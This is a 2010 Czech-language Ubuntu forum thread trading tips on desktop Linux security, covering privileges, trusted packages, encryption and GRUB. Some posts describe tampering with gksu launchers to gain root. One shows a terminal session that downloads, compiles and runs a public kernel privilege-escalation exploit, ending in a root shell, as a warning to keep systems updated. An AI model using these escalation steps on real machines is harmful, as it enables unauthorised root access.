Prosíme přihlašte se nebo zaregistrujte.

Přihlašte se svým uživatelským jménem a heslem.
Vaše pomoc je stále potřeba!

Autor Téma: Máte tipy na zvýšení bezpečnosti Ubuntu?  (Přečteno 10170 krát)

jmp

  • Host
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #25 kdy: 22 Září 2010, 08:08:27 »
Citace
Linux prostě nejsou widle, kde si jakýkoliv program může dělat, co ho napadne.

Obavam se, ze to je velmi zastaraly pohled na vec... (posledni takove Windows byly neuspesne Windows ME - od te doby jsou veskera windows zalozena na NTckach)
Windows NT maji nativne viceuzivatelsky rezim stejne jako unixy uz od dob sveho vzniku (osobne jsem videl poprve linux i winNT nekdy ve skolnim roce '96-'97). A bezna prace s windows pod administratorem je stejne doporucovana praxe jako bezna prace s unixem pod rootem. :-D

Spis bych rekl, ze si lide pusobi skody neznalosti, omylem, nepozornosti a ignorantsvim - tady pak uz nezalezi na typu OS, ale na uzivatelich. Oba typy OS maji potencial minimalizovat napachane skody - jde jen o to, jak jsou pouzivany...

mka

  • Závislák
  • ***
  • Příspěvků: 1907
  • Chybovat je moje.
    • Příložany Cé Zet
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #26 kdy: 22 Září 2010, 10:08:52 »
Citace
Linux prostě nejsou widle, kde si jakýkoliv program může dělat, co ho napadne.
Windows NT maji nativne viceuzivatelsky rezim stejne jako unixy uz od dob sveho vzniku...
... což je sice hezké, ale drtivá většina uživatelů s k widlím přihlašuje pod účtem s právy administrátora.

I kdyby sis nainstaloval nějakou hodně poťouchlou aplikaci, tak bez práv roota by stejně měla být víceméně bezzubá. Linux prostě nejsou widle, kde si jakýkoliv program může dělat, co ho napadne.
S tím bych si dovolil nesouhlasit. Člověk většinou instaluje s právy roota, takže "poťouchlá aplikace" si může nastavit (třeba pomocí postinst skriptu) víceméně cokoli. Pak si díky právům roota může právě dělat, co chce. To je velká síla a zároveň zranitelnost Linuxu - pro roota prakticky (mimo dejme tomu kernel, který je ale také možno měnit) neexistují restrikce.
No, předpokládám, že do distribuce by se aplikace s nějakým evil postinst skriptem neměla dostat. Krom toho při instalaci běží pod rootem instalátor, nikoliv instalovaná aplikace. Stejně tak předpokládám, že se do dobré distribuce nedostanou nějací divocí démoni, kteří se spouští s právy roota a tropí neplechu. S důrazem na slovo dobré :-)
Ovšem pokud si někdo tak, jak je zvyklý z widlí, někde něco stáhne, nainstaluje a pak se diví, co že se to děje, tak je pak namístě stěžovat si na bezpečnostní díru mezi klávesnicí a židlí, nikoliv v systému :-)

P.S.
A konec konců stále platí to, že vše, s čím zacházíme, ja tak bezpečné, jak bezpečně s tím zacházíme.
« Poslední změna: 22 Září 2010, 10:13:22 od mka »

brdokoky

  • Aktivní člen
  • *
  • Příspěvků: 194
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #27 kdy: 22 Září 2010, 10:42:48 »

Také je otázka, jestli by uživatel byl schopen detailnější informace k programu náležitě vyhodnotit, a pokud ano, pokud by pak nebylo pro něj jednodušší se mrknout do zdroje  8)
Takže testovací otázka: jaká je důvěryhodnost těchto aplikací (1-5): firefox, gdm, apparmor?  Příp. proč? :)

S tou dvoverihodnostou ,je to tak ved uz v ,,Ubuntu Software Centre,, je vzdy ku kazdemu softu napisane bud :

-Canonical provides critical updates for firefox until April 2013.

-Canonical does not provide updates for Ubuntu restricted extras. Some updates may be provided by the Ubuntu community.

-Canonical provides critical updates for gdm until April 2013.

-Canonical provides critical updates for apparmor until April 2015.

Takze s timto to podla mna vyzera tak, ze firefox, gdm , apparmor su ostro sledovane aplikacie na bezpecnost, ktorym mozem verit. Ale napriklad ,,Ubuntu restricted extras,, by bolo dobre instalaciu zvazit, bo je to zbierka kadejakych uzitocnych softov .

jmp

  • Host
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #28 kdy: 22 Září 2010, 10:59:14 »
Citace
Linux prostě nejsou widle, kde si jakýkoliv program může dělat, co ho napadne.
Windows NT maji nativne viceuzivatelsky rezim stejne jako unixy uz od dob sveho vzniku...
... což je sice hezké, ale drtivá většina uživatelů s k widlím přihlašuje pod účtem s právy administrátora.
tak tak - jen to znamena tu drobnost, ze chyba neni v OS, ale v tom, jak jej vetsina uzivatelu pouziva...

arrange

  • Závislák
  • ***
  • Příspěvků: 4031
  • "jdu s hlavou vztyčenou..."
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #29 kdy: 22 Září 2010, 13:02:54 »
jen to znamena tu drobnost, ze chyba neni v OS, ale v tom, jak jej vetsina uzivatelu pouziva...
Což je také důležité, protože "na defaultech záleží", takže částečně to chyba OS je.

Takze s timto to podla mna vyzera tak, ze firefox, gdm , apparmor su ostro sledovane aplikacie na bezpecnost, ktorym mozem verit.
Možná máš pravdu, a dané rozdělení na security, main, universe apod. se dá částečně použít. Za předpokladu, že věříš víc Canonicalu než komunitě  ;) Problém je ale v tom, že např. internetový prohlížeč je podle mě jedna z nejnebezpečnějších částí systému, díky své rozšířenosti, rozmanitosti (zásadních) aktivit, které na nich děláme ("komunikace s bankou"), komplexnosti, "skriptovatelnosti", nebo prostě jen díky tomu, že to jsou otevřené dveře do světa internetu. Stačí se podívat na počet (známých!) bugů/zranitelností, které se téměř denně ve FF najdou. A je (v zásadě) jedno, kdo ho spravuje.

Krom toho při instalaci běží pod rootem instalátor, nikoliv instalovaná aplikace.
To je sice pravda, ale instalátor žádným způsobem neomezuje, co si daná aplikace (a s jakými právy) nainstaluje, takže z hlediska bezpečnosti je to šumafú.
http://www.openstreetmap.org - mapy celého světa "wiki style"

brdokoky

  • Aktivní člen
  • *
  • Příspěvků: 194
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #30 kdy: 24 Září 2010, 02:32:39 »
Za předpokladu, že věříš víc Canonicalu než komunitě  ;)

To aby sme sa zase rozumeli, linux je open source, do ktorej nazera cela komunita a tak isto aj firmy. Ono to neznamena tak ,ze o firefox sa stara iba Canonical a komunita nie, prave naopak. O vsetko sa stara komunita ludi ,ale o urcity softwer ktory je suportovany distribuciou ubuntu ako je firefox ,apparmor...atd..sa dokladne este ku komunite staraju aj experti z Canonicalu. A ked sa tento isty soft nachadza aj v inych znamich ci neznamich distrach ako su  gentoo ,fedora... tiez tam do sourcu nazeraju dalsi experti. Preto sa da v klude povedat, ze tento soft je bezpecny. V porovnani niejakym skypkom, alebo operou co je uzavrety kod, si tam hocijaky rumun moze natrieskat malwer a dlho potrva ked mu na to pridu. A to si na skypko mozes nastavit aj apparmor profili a ti to mozno vobec nepomoze.

GlidingFLY

  • Stálý člen
  • **
  • Příspěvků: 1202
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #31 kdy: 24 Září 2010, 10:14:51 »
Zatraceně zajímavé téma, které arrange založil.
Kód: [Vybrat]
Což je také důležité, protože "na defaultech záleží", takže částečně to chyba OS je.a to je 100% pravda praxí ověřená. Převážná většina uživatelů počítačů totiž vůbec netuší jak si co nastavit atd. Jsou rádi, že zvládnou alespoň instalaci anebo si to nechají instalovat, či už koupí předinstalovaný poč. A dál to neřeší a používají to tak jak to je.
Brdokoky zmínil Skype, například. Osobně si myslím, že pokud budeme žít ve společnosti kde vítězí zisk nad zdravým rozumem, tak se velmi těžko bude zajišťovat bezpečnost počítačů. Skype je totiž typickým příkladem toho, že někdo vymyslí zajímavý projekt, ze kterého se dá těžit, zařídí masivní kampaň, aby oslovil co možná nejvíce uživatelů, nabídne jistou úlytbu. No a než se jeden ohlédne máme tu další potenciálně nebezpečný produkt. Není zkrátka čas zareagovat včas a varovat usery před tím, než to začnou používat. To je dnešní svět.
Arrange napsal:
Kód: [Vybrat]
Problém je ale v tom, že např. internetový prohlížeč je podle mě jedna z nejnebezpečnějších částí systému,
díky své rozšířenosti, rozmanitosti (zásadních) aktivit, které na nich děláme ("komunikace s bankou"), komplexnosti, "skriptovatelnosti",
nebo prostě jen díky tomu, že to jsou otevřené dveře do světa internetu.
Další 100% pravda. Uvedu jeden příklad z mých zkušeností s lidmi. Totiž obecně považuji FF za nejlepší prohlížeč ve všech aspektech v porovnání s ostatními. A již několikrát když tu a tam mne někdo osloví a požádá o pomoc, tak se jich ptám, proč používáte IE když FF je lepší a bezpečnější. A co mi odpověděli? Dost mne to poprvé ohromilo. "FF se mi nelíbí, špatně se ovládá, furt na mne vyskakují nějaké hlášky o modulech či co. IE je lepší protože je ticho".
No a tady bych se rád zeptal, jak chcete vyřešit tento postoj například ve Firefoxu? pro lidi je totiž pohodlí ovládání daleko důležitější než "nějaká" bezpečnost. Tu řeší až když ochoří jejich bobánek tím, že to dají někomu k léčbě. Zrovna Firefox je typický příklad toho, že nejde pouze o prohlížeč samotný, ale on má možnost vkládat moduly od dalších tvůrců, pluginy, doplňky. Jestli té diskusi, kterou založil Arrange, správně rozumím, tak mu jde o to, jak zabezpečit Ubuntu hned po instalaci systému proti napadení zvenčí.
Padla tu otázka komu vlastně věřit, jestli komunitě nebo Canonicalu. To je těžké, žijeme ve společnosti ekonomických zájmů, kde když se zastaví růst, tak ti ekonomičtí nenažranci vyhlašujou poplach. Takže v této souvislosti považuji Canonical za součást ekonomiky, jde mu totiž hlavně o to, jak s Ubuntu naložit až přijde jeho čas. Je to kšeft, o tom já nepochybuji. Komunita bude v opozici.
A mám já vůbec tip na zvýšení bezpečnosti Ubuntu? Čoveče já vůbec nevím jestli to jde. Běží v něm mnoho jiného softwaru, jejichž tvůrci mají jiné postoje, jiné priority. Mohlo by to jít jedině, pokud by celý systém včetně internetu byl vytvořen samostatným subjektem jako celek. Třeba jako Android  ;)
» Linux Mint on mini-ITX boards «

foitt

  • Návštěvník
  • Příspěvků: 23
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #32 kdy: 24 Září 2010, 12:02:45 »
linux nejsou sice wokna ale v tomto případě se jakýkoliv rozdíly stíraj.... zatímco ve starých dobrých jedinečných dokonalých bestovních (až skoro se boim že z toho pomalu někteří XP zaslepenci udělali nový linux distro a cpou to "všude a zadarmo") zatímco po tyto byly všeobecný root práva default, tak od Vista/7 to tak není, i hlavní admin účet nemá root práva a systém se na ně dotazuje pomocí otravného UAC (který jak známo zase každej rádobyexpert hnedka vypíná, že ho to otravuje, mezi náma když mě Ubuntu každý přihlášení do systému otravuje se zadá ním hesla k nějký "přihlašovací klíčence" ky mámzadáno přihlašovt automaticky, tak mě to root heslo taky docela otravuje a rád bych v linuxu ty root dotazy vypnul....
ovšem princim pro uživatele "typu bezmozek" je stejný, chce do systému "nacpat" tu pochybnou aplikaci s nedůvěryhodným zdrojem, prostě ji tam chce, tak v obou případech povýší práva na roota a "otevře dveře":-))

mka

  • Závislák
  • ***
  • Příspěvků: 1907
  • Chybovat je moje.
    • Příložany Cé Zet
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #33 kdy: 24 Září 2010, 13:06:04 »
a to je 100% pravda...
Další 100% pravda...
Miluju 100% pravdy. Obvykle se z nich vyklube pěknej feljmíček :-)

GlidingFLY

  • Stálý člen
  • **
  • Příspěvků: 1202
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #34 kdy: 24 Září 2010, 18:02:55 »
Ach ouvejs, flejmíček jsem neměl v úmyslu. Bylo to pouze zamyšlení nad otázkami bezpečnosti k podpoře toho o co se v tomto tématu arrange snaží. Rozhodně má smysl se tímto zabývat. Dám si příště pozor.
» Linux Mint on mini-ITX boards «

mka

  • Závislák
  • ***
  • Příspěvků: 1907
  • Chybovat je moje.
    • Příložany Cé Zet
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #35 kdy: 24 Září 2010, 18:11:42 »
V pohodě :-)
Beztak se du beseduje spíš než o bezpečnosti systému jako takového o tom, jak dokáže správně sebevědomý BFU poslat sebezabezpečenější systém jedním kliknutím totálně do háje. A to je, myslím, jádro pudla!!!

arrange

  • Závislák
  • ***
  • Příspěvků: 4031
  • "jdu s hlavou vztyčenou..."
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #36 kdy: 24 Září 2010, 18:38:23 »
jak dokáže správně sebevědomý BFU poslat sebezabezpečenější systém jedním kliknutím totálně do háje
JJ, souhlas, měly by to být tipy, co dělat, ale i co NEdělat, takže směle do toho!  ;)
http://www.openstreetmap.org - mapy celého světa "wiki style"

mka

  • Závislák
  • ***
  • Příspěvků: 1907
  • Chybovat je moje.
    • Příložany Cé Zet
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #37 kdy: 24 Září 2010, 19:02:41 »
jak dokáže správně sebevědomý BFU poslat sebezabezpečenější systém jedním kliknutím totálně do háje
JJ, souhlas, měly by to být tipy, co dělat, ale i co NEdělat, takže směle do toho!  ;)
Však už jsem psal: http://forum.ubuntu.cz/index.php/topic,50322.msg363358.html#msg363358

brdokoky

  • Aktivní člen
  • *
  • Příspěvků: 194
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #38 kdy: 09 Října 2010, 14:23:25 »
Tu je zaujimava stranka, chlapik vysvetluje ako sa da pouzit virus na linuxe. Dost ma to zaskocilo.

How to write a Linux virus in 5 easy steps

http://www.geekzone.co.nz/foobar/6229

arrange

  • Závislák
  • ***
  • Příspěvků: 4031
  • "jdu s hlavou vztyčenou..."
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #39 kdy: 09 Října 2010, 21:47:28 »
Tu je zaujimava stranka, chlapik vysvetluje ako sa da pouzit virus na linuxe. Dost ma to zaskocilo.

How to write a Linux virus in 5 easy steps

http://www.geekzone.co.nz/foobar/6229

Díky za tip, docela jsem se těšil, jak to bude fungovat, ale buď mi něco uniklo, anebo je tento postup v novém Gnome víceméně nanic:
  • příloha typu desktop se v Thunderbirdu objeví nahá jako textový soubor, takže jde všechny skryté poťouchlosti přečíst
  • kdyby i tak se někdo dal přesvědčit, ať tento soubor uloží na plochu, stejně opět uvidí jen textový soubor, který NEMÁ práva spouštění
  • i kdyby na něj kliknul, objeví se okno s varováním, a jediná možnost je Zrušit

Ano, pokud vytvořím spouštěč na vlastním stroji, tak to funguje dle popisu, pokud to ale pošlu mailem nebo přes web (taky jsem zkoušel), tak velmi, velmi těžko.

http://www.openstreetmap.org - mapy celého světa "wiki style"

arrange

  • Závislák
  • ***
  • Příspěvků: 4031
  • "jdu s hlavou vztyčenou..."
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #40 kdy: 09 Října 2010, 22:54:42 »
Á, tak druhá část příspěvku, jak získat root práva, je už mnohem zajímavější, včetně poznámky uživatele Flimm.

POKUD se mi podaří přimět uživatele, aby spustil můj skript (to je ta těžší část), je možné pomocí změny spouštěče aplikace typu Synaptic, Zdroje softwaru apod. (používající pro spouštění gksu) zaručit, aby se spustil i nějaký můj skript s právy root bez toho, že by si toho uživatel měl šanci všimnout (to jsem si vyzkoušel). Dobrá zpráva je, že gksu dnes mohutně ustupuje na úkor PolicyKit, kde by to už bylo mnohem náročnější, ale asi ne nemožné - to si nejsem jistý  :P.
http://www.openstreetmap.org - mapy celého světa "wiki style"

RRRadek Neužil

  • Člen občanského sdružení Ubuntu ČR a placené komunitní podpory
  • Administrátor fóra
  • Závislák
  • ******
  • Příspěvků: 4672
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #41 kdy: 14 Října 2010, 10:17:44 »
Tak jsem si myslel že šifrování je to nejlepší co mohu pro svou bezpečnost udělat ale toto mě dostalo. :o
http://technet.idnes.cz/tec_technika.asp?c=A080221_230606_tec_denik_pka
Sice šlo o windows šifrování ale předpokládám že Linux také ukládá heslo do paměti RAM. Takže šifrováním sice nemusím rozmlátit HDD kladivem ale místo toho musím rozšlapat RAM  ;D
PS: omluvte moji češtinu není to moje silná stránka, snažím se hlavně vystihnou podstatu problému. ;)

mka

  • Závislák
  • ***
  • Příspěvků: 1907
  • Chybovat je moje.
    • Příložany Cé Zet
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #42 kdy: 14 Října 2010, 11:35:10 »
Tak jsem si myslel že šifrování je to nejlepší co mohu pro svou bezpečnost udělat ale toto mě dostalo. :o
http://technet.idnes.cz/tec_technika.asp?c=A080221_230606_tec_denik_pka
Sice šlo o windows šifrování ale předpokládám že Linux také ukládá heslo do paměti RAM. Takže šifrováním sice nemusím rozmlátit HDD kladivem ale místo toho musím rozšlapat RAM  ;D

Ale klíd, to houbeles. Podívej se co zkoumá např. NBU - http://www.nbu.cz/cs/vyzkum-a-vyvoj/, třetí odrážka :-)

RRRadek Neužil

  • Člen občanského sdružení Ubuntu ČR a placené komunitní podpory
  • Administrátor fóra
  • Závislák
  • ******
  • Příspěvků: 4672
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #43 kdy: 14 Října 2010, 12:28:06 »
To jako klid že se neubráním ať dělám co chci nebo že tak šikovní naši úředníci nejsou  ???
PS: omluvte moji češtinu není to moje silná stránka, snažím se hlavně vystihnou podstatu problému. ;)

mka

  • Závislák
  • ***
  • Příspěvků: 1907
  • Chybovat je moje.
    • Příložany Cé Zet
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #44 kdy: 14 Října 2010, 12:40:25 »
To jako klid že se neubráním ať dělám co chci nebo že tak šikovní naši úředníci nejsou  ???

No, pokud třeba falšuješ účetnictví a přitom elektromagneticky vyzařuješ, tak si pak nestěžuj. Čistě teoreticky může za zdí sedět úředník s mašinkou připomínající diktafon, kterou jistě zvládne obsluhovat i (běžný franta) úředník a která zaznamenává a zaznamenává a interpretuje a ... :-)

arrange

  • Závislák
  • ***
  • Příspěvků: 4031
  • "jdu s hlavou vztyčenou..."
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #45 kdy: 25 Října 2010, 17:39:34 »
Také pravidelně aktualizovat systém. Třeba teď, pokud jste za posledních pár dnů neaktualizovali, máte díru v kernelu...
Kód: [Vybrat]
arrange@mm-lean:~$ wget http://www.vsecurity.com/download/tools/linux-rds-exploit.c
arrange@mm-lean:~$ gcc -o exploit linux-rds-exploit.c
arrange@mm-lean:~$ ./exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved rds_proto_ops to 0xf9bf8a40
 [+] Resolved rds_ioctl to 0xf9bf2000
 [+] Resolved commit_creds to 0xc016c830
 [+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami
root

Zdroj:
http://www.vsecurity.com/resources/advisory/20101019-1/
http://www.openstreetmap.org - mapy celého světa "wiki style"

panet

  • Aktivní člen
  • *
  • Příspěvků: 147
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #46 kdy: 25 Října 2010, 23:11:53 »
Snad jsem to neprehledl nekde vyse:

Bezpecnost/zabezpeceni Grubu

Duvod:
Po defaultni instalaci si system vynuti heslo (ted myslim v systemu), pri zmene tohoto hesla si pamatuje kde co, kdyz jsem jej chtel zmenit kvuli testum, po delsi dobe jsem to vzdal (chtel jsem jednodussi - netvrdim, ze to nejde nastavit, intuitivne jsem na to neprisel) - celkovy dojem LAIKA (treba me) - Ubuntu je dobre a paranoidne zabezpeceno.
PAK zjistim, ze skrze Grub (taktez v defaultnim nastaveni) je mozne heslo roota bez problemu obejit...
Jsem Linuxovy pozorovatel, prilezitostny uzivatel.

Yontalcar

  • Stálý člen
  • **
  • Příspěvků: 833
  • Semper fidelis
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #47 kdy: 26 Října 2010, 14:41:31 »
@panet
A teď si vem, že kdokoliv ti může do kompu vrazit flešku, nabootovat z ní nějakou live distribuci a upravovat co bude chtít! Ta hrůza!
NB: ASUS X53U - AMD Brazos E450; Debian GNU/Linux Sid amd64 (KDE 4.14)
Jen dvě věci jsou nekonečné - vesmír a lidská hloupost. Tím prvním si ovšem nejsem tak jist. - Albert Einstein

panet

  • Aktivní člen
  • *
  • Příspěvků: 147
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #48 kdy: 26 Října 2010, 14:48:05 »
O tom to snad neni...
Bootovat muze, az mu to bios dovoli. Musi podniknout nejake kroky, mit tu flashku a podobne. U nezabezpeceneho Grubu nepotrebuje nic.
Jsem Linuxovy pozorovatel, prilezitostny uzivatel.

Yontalcar

  • Stálý člen
  • **
  • Příspěvků: 833
  • Semper fidelis
Re: Máte tipy na zvýšení bezpečnosti Ubuntu?
« Odpověď #49 kdy: 26 Října 2010, 20:07:42 »
flash se strčí do kapsy, při startu zmáčkne F8 a vybere boot z USB - co je na tom těžkého?
většinou(!) lze boot z USB zakázat a BIOS zaheslovat, ale BFU to stejně neumí nastavit
jediné pořádné zabezpečení je šifrování

ale je fakt, že by to nastavení autentizace mohli alespoň do toho Startupmanageru (nebo jak se to jmenuje)
« Poslední změna: 26 Října 2010, 20:10:01 od Yontalcar »
NB: ASUS X53U - AMD Brazos E450; Debian GNU/Linux Sid amd64 (KDE 4.14)
Jen dvě věci jsou nekonečné - vesmír a lidská hloupost. Tím prvním si ovšem nejsem tak jist. - Albert Einstein

 

Provoz zaštiťuje spolek OpenAlt.